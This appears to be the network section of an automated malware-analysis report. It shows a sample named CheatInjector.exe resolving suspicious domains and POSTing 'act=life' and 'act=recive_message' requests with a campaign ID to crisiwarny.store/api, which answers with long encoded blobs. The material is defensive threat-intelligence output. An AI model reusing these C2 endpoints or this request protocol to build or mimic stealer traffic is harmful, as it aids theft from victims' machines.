                                                              Oct 26, 2024 07:01:15.824101925 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:15.824599981 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:15.831916094 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:15.832046986 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:15.832160950 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:15.832247972 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:15.832266092 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:16.456449986 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:16.456799030 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:16.456795931 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:16.456877947 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:16.880739927 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:16.880836010 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:16.880923033 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:16.881238937 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:16.881273985 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:17.740658998 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:17.740777969 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:17.742046118 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:17.742074013 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:17.742522001 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:17.743895054 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:17.743895054 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:17.743989944 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:18.171531916 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:18.171750069 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:18.171854019 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:18.171951056 CEST49742443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:18.171991110 CEST44349742104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:18.636717081 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:18.636756897 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:18.636833906 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:18.637141943 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:18.637161016 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.559916973 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.560188055 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.561305046 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.561311007 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.562130928 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.567337990 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568030119 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568181038 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.568269968 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568317890 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.568419933 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568526983 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.568633080 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568661928 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.568783045 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568813086 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.568959951 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.568984985 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.568994045 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.569111109 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.569134951 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.579571009 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.579725027 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.579761028 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.579777002 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.579796076 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.579958916 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.579984903 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:19.580003023 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.580033064 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:19.580091953 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:21.933140993 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:21.933376074 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:21.933434963 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:21.933478117 CEST49744443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:21.933490992 CEST44349744104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:21.960803986 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:21.960833073 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:21.960895061 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:21.961242914 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:21.961256981 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:22.790865898 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:22.790962934 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:22.792165041 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:22.792182922 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:22.792568922 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:22.793822050 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:22.793888092 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:22.793926001 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:23.129004002 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:23.129239082 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:23.129405975 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:23.129581928 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:23.129582882 CEST49746443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:23.129594088 CEST44349746104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:23.129601002 CEST44349746104.21.95.91192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 26, 2024 07:01:07.503952980 CEST5913053192.168.2.41.1.1.1
                                                              Oct 26, 2024 07:01:07.514802933 CEST53591301.1.1.1192.168.2.4
                                                              Oct 26, 2024 07:01:07.536637068 CEST5593353192.168.2.41.1.1.1
                                                              Oct 26, 2024 07:01:07.546303034 CEST53559331.1.1.1192.168.2.4
                                                              Oct 26, 2024 07:01:07.548238993 CEST5490753192.168.2.41.1.1.1
                                                              Oct 26, 2024 07:01:07.559782982 CEST53549071.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 26, 2024 07:01:07.503952980 CEST192.168.2.41.1.1.10xc0adStandard query (0)prinyveri.cfdA (IP address)IN (0x0001)false
                                                              Oct 26, 2024 07:01:07.536637068 CEST192.168.2.41.1.1.10xf44cStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                              Oct 26, 2024 07:01:07.548238993 CEST192.168.2.41.1.1.10x5a32Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 26, 2024 07:01:07.514802933 CEST1.1.1.1192.168.2.40xc0adName error (3)prinyveri.cfdnonenoneA (IP address)IN (0x0001)false
                                                              Oct 26, 2024 07:01:07.546303034 CEST1.1.1.1192.168.2.40xf44cName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                              Oct 26, 2024 07:01:07.559782982 CEST1.1.1.1192.168.2.40x5a32No error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false
                                                              Oct 26, 2024 07:01:07.559782982 CEST1.1.1.1192.168.2.40x5a32No error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • crisiwarny.store

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449730104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:08 UTC263OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 8
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                              Data Ascii: act=life
                                                              2024-10-26 05:01:09 UTC1008INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:09 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=lk91lrp1mu6h0hm1o3l6lv5dhr; expires=Tue, 18 Feb 2025 22:47:48 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwlGh0XCtcaQjXFhUULE891YtUdKL0wsW0JFGoTjGKswTLZspL1ETfwfk5dnHJNlB6%2BWOIX1T3v5kRHqKU6JR59G%2BY4YQNoPazfCdmdrKmtkbwWgnkWYth1TU9W%2BQYYD8aeT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e3031eb66b9d-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2509532&cwnd=251&unsent_bytes=0&cid=2d930f2c9d31ac45&ts=1208&x=0"
                                                              2024-10-26 05:01:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                              Data Ascii: 2ok
                                                              2024-10-26 05:01:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449732104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:10 UTC264OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 54
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:10 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71 6d 71 72 69 75 62 78 26 6a 3d
                                                              Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--qgfvqmqriubx&j=
                                                              2024-10-26 05:01:10 UTC1006INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:10 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=17k8j28gopa8ag4n0iukqnk1gl; expires=Tue, 18 Feb 2025 22:47:49 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nu1tnowPf0tBrGgoVTnZ%2FUJCEO1wGE5EZFL4w3GnaqhGvhQ6N7UfynoaDDiNgUyLYaMGyRvH%2F8mLzvTmYHcnUStpu6C1rYiTj%2Fq30WCfMoWPsWxB6WJTY3Ojd8VgSd2j7ufC"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e30c2e6e6f78-CDG
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=119530&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=954&delivery_rate=23886&cwnd=32&unsent_bytes=0&cid=21d5812a8e76e406&ts=425&x=0"
                                                              2024-10-26 05:01:10 UTC363INData Raw: 34 64 64 0d 0a 31 6d 74 6c 62 45 64 36 63 50 72 62 42 44 63 35 44 79 66 44 2f 78 4c 57 36 5a 73 4b 66 62 75 75 68 53 51 4d 59 68 4b 75 72 79 79 74 53 52 4e 4f 66 55 35 63 32 4b 68 68 46 51 4e 37 56 62 61 61 50 76 53 49 2f 79 68 48 33 63 2f 70 56 32 6c 4f 4d 4e 6a 43 44 75 77 4e 42 41 41 30 48 31 7a 59 76 6e 77 56 41 31 52 63 34 5a 70 38 39 4e 4f 35 62 78 66 5a 7a 2b 6c 47 62 51 6c 39 33 73 4e 50 76 67 63 43 42 43 49 5a 46 4a 75 33 61 56 4a 63 61 6b 61 70 6b 58 75 37 67 66 59 6f 55 5a 6e 4c 2f 77 59 32 51 46 2f 4c 32 30 32 62 43 68 59 48 5a 51 64 63 67 66 6c 68 57 52 73 31 42 61 4b 61 63 4c 71 50 2f 32 45 56 30 38 62 68 52 32 67 49 59 73 66 4a 52 4c 34 4a 41 51 55 6f 45 41 43 57 76 57 35 5a 57 6d 42 47 34 64 4d 77 73 35 4f 35 4d 46 2b 4b 2f 75 52 58 66 78
                                                              Data Ascii: 4dd1mtlbEd6cPrbBDc5DyfD/xLW6ZsKfbuuhSQMYhKuryytSRNOfU5c2KhhFQN7VbaaPvSI/yhH3c/pV2lOMNjCDuwNBAA0H1zYvnwVA1Rc4Zp89NO5bxfZz+lGbQl93sNPvgcCBCIZFJu3aVJcakapkXu7gfYoUZnL/wY2QF/L202bChYHZQdcgflhWRs1BaKacLqP/2EV08bhR2gIYsfJRL4JAQUoEACWvW5ZWmBG4dMws5O5MF+K/uRXfx
                                                              2024-10-26 05:01:10 UTC889INData Raw: 39 4f 71 4a 42 39 74 49 62 7a 5a 78 7a 5a 79 2b 31 4d 59 51 70 30 77 63 42 49 74 41 6c 48 51 47 55 66 43 74 6a 68 4a 6e 5a 65 66 55 4b 74 69 7a 4b 4f 79 2b 59 6d 42 70 6e 4c 36 77 59 32 51 48 6a 4a 7a 6b 32 2f 42 67 51 47 4c 67 6f 53 69 72 39 72 55 45 6c 72 51 4b 2b 58 63 36 61 42 39 32 34 63 30 4d 66 75 51 32 6b 45 4d 49 4b 4e 53 61 78 4a 58 30 34 45 46 52 6d 55 73 33 46 56 47 33 49 4c 75 4e 31 33 75 4d 75 68 4b 42 76 59 79 4f 5a 43 59 41 35 30 77 4d 74 41 75 51 59 42 42 43 55 66 47 4a 43 78 5a 31 68 51 59 6b 57 6b 6b 48 53 79 68 2f 68 74 58 35 65 4d 34 46 34 75 57 44 44 69 79 6b 32 6d 53 7a 49 4e 4b 78 59 56 6a 76 6c 35 47 30 49 74 51 71 33 64 4b 50 53 46 2f 47 63 4e 32 4e 37 69 53 48 77 4d 64 63 72 41 54 62 6f 4a 41 67 6b 6f 46 68 53 66 75 6d 35 52 57
                                                              Data Ascii: 9OqJB9tIbzZxzZy+1MYQp0wcBItAlHQGUfCtjhJnZefUKtizKOy+YmBpnL6wY2QHjJzk2/BgQGLgoSir9rUElrQK+Xc6aB924c0MfuQ2kEMIKNSaxJX04EFRmUs3FVG3ILuN13uMuhKBvYyOZCYA50wMtAuQYBBCUfGJCxZ1hQYkWkkHSyh/htX5eM4F4uWDDiyk2mSzINKxYVjvl5G0ItQq3dKPSF/GcN2N7iSHwMdcrATboJAgkoFhSfum5RW
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 33 66 38 66 0d 0a 52 32 52 73 47 39 48 55 57 46 4c 73 35 42 36 73 59 58 31 62 52 44 5a 7a 65 5a 49 5a 41 73 77 67 6f 31 4a 72 45 6c 66 54 67 6f 56 41 6f 71 7a 62 55 51 5a 57 45 61 76 6b 33 65 69 79 2b 59 6d 42 70 6e 4c 36 77 59 32 51 48 76 4b 77 55 4b 30 44 78 55 41 4b 67 6f 59 69 72 31 6f 55 56 64 6a 54 4b 79 53 64 61 61 50 2b 58 6f 65 33 4d 76 70 53 33 77 46 4d 49 4b 4e 53 61 78 4a 58 30 34 66 4c 42 57 49 71 47 45 58 62 6d 35 4c 72 35 70 6d 39 4a 53 33 63 56 2f 65 77 4b 63 65 4c 67 4e 38 77 63 52 4c 75 78 73 4e 41 69 51 4b 46 5a 47 77 62 46 52 56 59 6b 36 74 6d 47 4b 2f 68 50 46 6e 48 74 54 42 37 45 4a 75 51 44 36 4d 79 6c 62 30 55 55 63 76 4b 42 63 41 6d 36 67 6b 59 46 68 6a 53 36 61 4c 4d 4b 76 46 34 43 67 59 31 59 79 2f 42 6d 38 4d 66 4d 33 43 53 4c
                                                              Data Ascii: 3f8fR2RsG9HUWFLs5B6sYX1bRDZzeZIZAswgo1JrElfTgoVAoqzbUQZWEavk3eiy+YmBpnL6wY2QHvKwUK0DxUAKgoYir1oUVdjTKySdaaP+Xoe3MvpS3wFMIKNSaxJX04fLBWIqGEXbm5Lr5pm9JS3cV/ewKceLgN8wcRLuxsNAiQKFZGwbFRVYk6tmGK/hPFnHtTB7EJuQD6Mylb0UUcvKBcAm6gkYFhjS6aLMKvF4CgY1Yy/Bm8MfM3CSL
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 4c 68 77 57 6d 4c 52 74 57 31 56 6b 53 61 6d 52 64 36 61 47 2f 47 41 56 30 4d 6e 72 53 32 30 53 63 38 32 4e 41 50 51 4f 48 30 35 39 57 44 57 72 6a 6b 55 56 52 43 4e 63 34 5a 70 38 39 4e 4f 35 61 52 66 65 77 75 4e 55 59 42 4a 2b 79 38 31 49 76 41 45 41 41 69 73 57 41 4a 43 34 5a 6c 74 55 5a 55 79 6c 6e 48 53 77 68 2f 34 6f 55 5a 6e 4c 2f 77 59 32 51 46 6a 50 31 31 54 32 4a 77 77 4f 49 67 67 45 67 2f 6c 35 47 30 49 74 51 71 33 64 4b 50 53 50 38 6d 49 57 32 73 58 6a 53 32 34 4a 66 38 58 46 51 37 77 62 42 67 51 33 48 42 65 5a 74 6d 78 52 55 32 46 4b 72 5a 6c 69 76 38 75 33 4b 42 6a 42 6a 4c 38 47 54 67 74 6d 37 39 39 63 39 42 5a 4a 46 32 55 66 48 74 6a 68 4a 6c 78 58 62 45 53 72 6d 33 75 78 68 76 6c 74 46 64 37 41 35 30 5a 74 42 6e 62 42 78 55 61 34 42 51 51
                                                              Data Ascii: LhwWmLRtW1VkSamRd6aG/GAV0MnrS20Sc82NAPQOH059WDWrjkUVRCNc4Zp89NO5aRfewuNUYBJ+y81IvAEAAisWAJC4ZltUZUylnHSwh/4oUZnL/wY2QFjP11T2JwwOIggEg/l5G0ItQq3dKPSP8mIW2sXjS24Jf8XFQ7wbBgQ3HBeZtmxRU2FKrZliv8u3KBjBjL8GTgtm799c9BZJF2UfHtjhJlxXbESrm3uxhvltFd7A50ZtBnbBxUa4BQQ
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 70 4f 2f 61 46 52 64 59 55 6a 68 30 7a 43 7a 6b 37 6b 77 58 2f 37 57 36 6b 42 35 45 55 58 4c 7a 52 2f 30 46 6b 6b 58 5a 52 38 65 32 4f 45 6d 57 46 64 6e 53 4b 53 5a 65 4c 4f 49 2b 47 51 62 31 4d 48 6a 54 32 6f 46 59 74 37 4c 51 4c 51 47 43 51 45 70 43 68 79 64 75 57 6f 56 46 53 31 43 75 64 30 6f 39 4c 72 75 61 46 2f 47 67 76 34 47 61 51 77 77 6c 49 31 42 75 52 73 4c 41 53 55 5a 45 5a 79 79 59 56 4e 64 62 45 61 6b 6e 6e 57 79 69 76 6c 6b 46 64 37 45 37 55 68 6a 42 6e 54 4b 79 77 37 36 53 51 41 57 5a 55 42 53 71 72 52 6f 58 46 68 72 53 4c 65 31 51 66 53 55 74 33 46 66 33 73 43 6e 48 69 34 45 65 38 54 42 53 37 77 4d 42 67 59 76 45 42 32 58 71 32 64 61 55 6d 70 4f 72 4a 4a 2b 73 59 58 72 62 78 54 53 78 4f 35 49 61 45 41 2b 6a 4d 70 57 39 46 46 48 4f 43 59 57
                                                              Data Ascii: pO/aFRdYUjh0zCzk7kwX/7W6kB5EUXLzR/0FkkXZR8e2OEmWFdnSKSZeLOI+GQb1MHjT2oFYt7LQLQGCQEpChyduWoVFS1Cud0o9LruaF/Ggv4GaQwwlI1BuRsLASUZEZyyYVNdbEaknnWyivlkFd7E7UhjBnTKyw76SQAWZUBSqrRoXFhrSLe1QfSUt3Ff3sCnHi4Ee8TBS7wMBgYvEB2Xq2daUmpOrJJ+sYXrbxTSxO5IaEA+jMpW9FFHOCYW
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 4a 62 53 57 78 4b 34 64 4d 77 73 35 4f 35 4d 46 2f 6f 32 75 42 42 59 55 4a 5a 79 39 5a 50 76 67 6f 4d 41 6d 55 48 58 49 48 35 59 56 6b 62 4e 51 57 73 6b 58 32 77 6d 66 56 6f 48 39 44 4c 37 56 52 68 44 33 33 50 7a 55 75 6d 43 42 55 42 4c 68 30 52 6e 4c 5a 70 57 56 4e 6e 42 65 2f 64 64 36 7a 4c 6f 53 67 7a 32 74 33 74 42 45 6b 61 5a 73 76 42 58 37 38 45 43 30 34 36 56 67 76 59 76 6d 6f 56 41 79 31 46 6f 4a 42 69 73 59 72 7a 59 68 4c 52 77 2b 4a 44 59 51 52 30 78 38 4e 63 75 67 59 48 43 43 34 5a 46 35 75 79 62 46 74 53 66 77 58 76 33 58 65 73 79 36 45 6f 4e 63 4c 4e 36 6b 6f 73 4c 6e 76 61 79 67 79 56 42 77 77 4a 4b 51 35 53 68 2f 64 2f 46 56 78 68 42 66 6e 64 65 62 71 48 2b 6d 38 58 30 63 6e 6e 54 57 34 50 65 73 4c 4b 58 4c 34 46 44 52 77 71 47 78 2b 63 74
                                                              Data Ascii: JbSWxK4dMws5O5MF/o2uBBYUJZy9ZPvgoMAmUHXIH5YVkbNQWskX2wmfVoH9DL7VRhD33PzUumCBUBLh0RnLZpWVNnBe/dd6zLoSgz2t3tBEkaZsvBX78EC046VgvYvmoVAy1FoJBisYrzYhLRw+JDYQR0x8NcugYHCC4ZF5uybFtSfwXv3Xesy6EoNcLN6kosLnvaygyVBwwJKQ5Sh/d/FVxhBfndebqH+m8X0cnnTW4PesLKXL4FDRwqGx+ct
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 74 51 71 33 64 4b 50 53 4c 2f 57 51 63 33 73 4c 6f 53 32 45 48 65 38 50 48 51 4b 59 47 41 67 59 70 45 42 2b 4b 73 32 78 48 55 6d 52 49 72 35 56 69 74 38 75 33 4b 42 6a 42 6a 4c 38 47 58 41 70 7a 77 4e 74 44 75 30 6b 59 51 44 78 59 46 5a 54 35 50 68 56 4a 66 30 57 71 6e 58 65 36 6d 66 68 67 45 4e 50 4d 34 55 31 6b 41 33 6e 49 77 30 65 79 43 41 6f 50 4a 42 67 58 6d 4c 42 30 57 42 73 6a 42 61 61 46 4d 4f 7a 4c 7a 6d 51 55 36 4d 2f 78 42 6e 46 4f 61 59 7a 4b 51 76 52 52 52 77 38 33 46 52 71 63 75 57 74 54 55 47 78 45 6f 70 31 77 74 34 76 38 59 78 44 66 79 2b 70 4d 5a 77 6c 69 78 4d 6c 63 74 41 55 44 54 6d 74 59 46 59 44 35 50 68 56 72 62 6b 36 74 6e 58 32 68 79 2b 59 6d 42 70 6e 4c 36 77 59 32 51 48 6a 48 78 6b 69 2f 43 67 51 41 4c 68 49 64 6c 37 4e 67 55 31
                                                              Data Ascii: tQq3dKPSL/WQc3sLoS2EHe8PHQKYGAgYpEB+Ks2xHUmRIr5Vit8u3KBjBjL8GXApzwNtDu0kYQDxYFZT5PhVJf0WqnXe6mfhgENPM4U1kA3nIw0eyCAoPJBgXmLB0WBsjBaaFMOzLzmQU6M/xBnFOaYzKQvRRRw83FRqcuWtTUGxEop1wt4v8YxDfy+pMZwlixMlctAUDTmtYFYD5PhVrbk6tnX2hy+YmBpnL6wY2QHjHxki/CgQALhIdl7NgU1
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 6c 6e 7a 32 69 76 52 34 47 4a 6d 43 70 30 41 75 57 43 43 43 6a 55 71 6c 53 56 39 65 64 30 4e 48 79 2b 34 32 42 30 51 6a 58 4f 47 4c 4d 4f 7a 5a 74 79 67 4e 6d 5a 53 6e 41 57 30 53 59 73 72 4f 57 4c 64 4f 4f 54 41 46 45 78 36 62 74 57 64 53 47 79 4d 46 72 74 30 6f 6a 63 76 36 65 67 32 57 33 66 46 4c 66 67 63 38 78 4e 78 44 75 45 6c 4a 54 6d 6b 63 47 5a 53 38 59 55 55 55 66 31 57 71 6b 57 62 34 6a 2b 73 6f 55 5a 6e 64 37 45 6c 38 44 6e 65 44 33 46 69 35 47 51 51 4c 49 6c 51 61 69 62 52 71 46 52 55 74 55 4b 71 52 64 72 6d 65 74 6e 6b 4a 32 74 72 67 43 6d 59 52 66 63 43 4e 63 66 70 4a 48 30 35 39 57 43 65 62 74 32 68 53 54 58 77 49 67 5a 5a 38 74 34 66 34 62 31 2b 58 6a 4f 45 47 4e 6c 4d 2b 6a 4d 6c 66 39 46 46 58 58 48 35 4e 51 63 2f 70 4e 45 6f 56 64 41 57
                                                              Data Ascii: lnz2ivR4GJmCp0AuWCCCjUqlSV9ed0NHy+42B0QjXOGLMOzZtygNmZSnAW0SYsrOWLdOOTAFEx6btWdSGyMFrt0ojcv6eg2W3fFLfgc8xNxDuElJTmkcGZS8YUUUf1WqkWb4j+soUZnd7El8DneD3Fi5GQQLIlQaibRqFRUtUKqRdrmetnkJ2trgCmYRfcCNcfpJH059WCebt2hSTXwIgZZ8t4f4b1+XjOEGNlM+jMlf9FFXXH5NQc/pNEoVdAW
                                                              2024-10-26 05:01:10 UTC1369INData Raw: 4e 69 33 4b 41 32 5a 6c 4b 63 42 59 41 31 78 7a 38 4e 4e 70 68 73 42 44 54 4d 62 56 61 61 48 51 31 68 57 61 45 75 6d 6f 30 36 56 67 65 6c 6c 45 4e 37 79 32 58 46 2f 42 32 43 4f 36 30 32 69 43 6b 64 41 5a 51 42 53 77 50 6c 48 58 30 74 67 53 71 62 64 50 76 53 50 75 54 42 66 2f 4d 48 71 51 32 41 48 4d 75 33 48 58 72 6b 47 41 45 35 72 57 42 37 59 34 53 5a 55 55 58 31 49 72 70 6f 38 73 35 48 2b 4b 46 47 5a 77 71 63 65 4c 67 46 36 33 4d 42 42 73 30 55 42 41 43 74 59 44 64 61 67 4a 6b 4d 62 4e 52 62 76 33 57 4c 30 30 37 6b 76 45 64 54 4e 35 45 68 74 45 6d 4c 4b 7a 6c 69 33 54 6a 6b 77 41 42 55 66 6e 62 64 68 61 32 56 4d 54 37 47 51 66 37 50 4a 32 57 38 4a 32 76 4c 5a 63 58 38 48 59 49 37 72 54 61 49 4b 52 30 42 6c 41 46 4c 41 2b 55 64 66 53 32 42 4b 70 74 39 51
